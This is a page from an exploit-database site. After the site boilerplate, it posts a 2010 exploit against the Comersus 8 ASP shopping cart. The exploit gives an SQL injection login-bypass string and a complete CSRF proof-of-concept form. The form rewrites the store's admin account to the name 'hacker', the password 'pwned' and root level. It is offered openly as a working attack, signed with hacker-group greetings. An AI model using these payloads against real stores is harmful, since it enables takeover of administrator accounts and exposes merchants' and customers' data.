0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Comersus 8 Shopping Cart SQL Injection and CSRF Vulnerability
============================================================= Comersus 8 Shopping Cart SQL Injection and CSRF Vulnerability ============================================================= # Exploit Title:SQL Injection and CSRF Vulnerability in Comersus 8 Shopping Cart # Version: Web Application # vendor :http://www.comersus.com/index.html # Date: 1 apr,2010 # Author:Sid3^effects # Code : -------------------------------------------------------------------------------------- #####################Sid3^effects aKa HaRi################################## #Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] #Thanks:*L0rd ?rusAd?r*,d4rk-blu™®,R45C4L idi0th4ck3r,CR4C|< 008,M4n0j,MaYuR #ShouTZ:kedar,dec0d3r,41.w4r10r #Catch us at www.andhrahackers.com or www.teamicw.in ############################################################################ Description : Top Rated free ASP Shopping Cart since year 2000 with Web Control Panel and StoreFront. Simple 3 Step Checkout, new template with CSS snippet based, SEO friendly, taxes, PayPal Standard, unlimited shipping rules, multilanguage, stock, RC4 encryption, auctions, reviews, order tracking, multilevel categories, digital goods distribution (serials, links, images, mp3). Optional Packs with Google Checkout, 2Checkout, PayPal Pro, UPS, USPS, DHL, SQL, mySQL, DES encryption, WAP catalog, YouTube Integration, sales forecasting, Java charts, Image Zoom, antifraud and more. ############################################################################ Xploit : (Auth Bypass) SQL Injection By using the combo ' or 1=1 or ''=' the attacker can login ############################################################################ Xploit : CSRF Vulnerability The Comersus 8 Shopping Cart is vulnerable to CSRF.The attacker can modify the options which are available. DEMO : TO change the admin login details and other info.. ################################################# <html> <body> <title> Comersus 8 Shopping Cart CSRF ATTACK </title> <center> <font face="courier new"size="6"> Comersus 8 Shopping Cart CSRF ATTACK <br> www.andhrahackers.com </center> <form method="post" name="modCust" action="http://server/backofficetest/backOfficePlus/comersus_backoffice_modifyUserForm.asp?idAdmin=14"> <table width="421" border="0"> <tr> </tr> <tr> <td width="168">Name</td> <td width="220"> <input type=text name=Name value="hacker"> </td> </tr> <tr> <td width="168"><strong>Password</strong></td> <td width="220"> <input type=text name=password value="pwned"> </td> </tr> <tr> <td width="168">Store</td> <td width="220"> <input type=text name=store value="English"> </td> </tr> <tr> <td width="168">Admin Level</td> <td width="220"> <input type=text name=Adminlevel value="Root"> </td> </tr> <td width="168">&nbps;</td> <td width="220">&nbps;</td> </tr> <tr> <td colspan="2"> <input type="submit" name="Modify" value="Modify"> </td> </tr> </table> </form> </body> </html> ########################################################################################### #Sid3^effects # 0day.today [2024-11-16] #